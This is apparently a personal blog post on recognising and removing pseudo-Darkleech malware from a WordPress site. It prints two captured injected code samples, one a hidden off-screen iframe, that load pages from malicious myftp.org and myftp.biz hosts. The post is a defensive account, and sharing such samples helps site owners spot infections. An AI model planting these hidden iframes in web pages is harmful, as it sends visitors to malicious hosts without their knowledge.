How to fix a pseudo-darkleech infected website?

If you want to know how I was struggling with this issue in details, check this blog out: [已解决]个人网站被植入恶意代码事件 | WordPress遭遇服务器端Darkleech注入，iFrame指向servepics.com、myftp.org、myftp.biz (Google translated from Chinese to English)  

To recognize whether your website has been infected with Darkleech malware or not

If you didn't do any changing to your website lately, but encountered with a pop-up window,  a floating advertisement or a strange frame that display on your webpage, this could be a sign that telling you your website has been infected by malware code. When you try to find them out, the suspected code just disappeared as nothing happened, but hey... you just saw the AD in minutes ago. Okay, it's time to tell you, your website has a high possibility that been infected by pseudo-darkleech malware.  

Samples of Darkleech malicious code

My WordPress blog was infected with Darkleech malware, the code looks like this:

"<iframe src=""http://bnlncvojj.myftp.org/q5evkc4qezi7bmfit3zhbap2edr5silbvbrzqw34l93yn2ebg"" width=""375"" height=""314"">"

"document.write('<style>.ifbeky { position:absolute; left:-1007px; top:-1975px} </style> <div class=""ifbeky""><iframe src=""http://xxtfhvss.myftp.biz/q5evkc4qezi7bmfit3zhbap2edr5silbvbrzqw34l93yn2ebg"" width=""314"" height=""107""></iframe></div>');"

All of malicious codes are pointing to one of (or many of) these domains dynamically: servepics.com myftp.org myftp.biz.   Another sample I'm going to show is a Chinese local portal website, the administrator was not do any update to the website, but one day someone found this fraudulent information: The behavior is: you could only see this fraudulent image in the first time of browsing this website. The source code between "the people who can see this fraudulent image" and "the people who cannot see this fraudulent image (which means already seen it in a day)" has a tiny different. It has been added a div tag for a class named as "popContent" when the malicious code is appearing.   You may ask me how can I ensure this malicious code is on server side but not in the file of your website. This is because the feature of this malicious code, it has been written to the file only while the guest can see the effect, otherwise, the malicious code will be gone. Let's think in the other way, if you prepare this malicious code to the file, at least you will find it whatever the effect is there or not. So I think this snippet of malicious code is much more like a WordPress plugin, which works on the server side, so it can easily insert into any file in anytime.  

What is the solution?

In my experience, change the server can be helpful, just state this problem you have to your service provider. I did in my case, my service provider couldn't solve this issue so I asked to change, after I deployed my blog to the new server, this annoying problem never bother me again.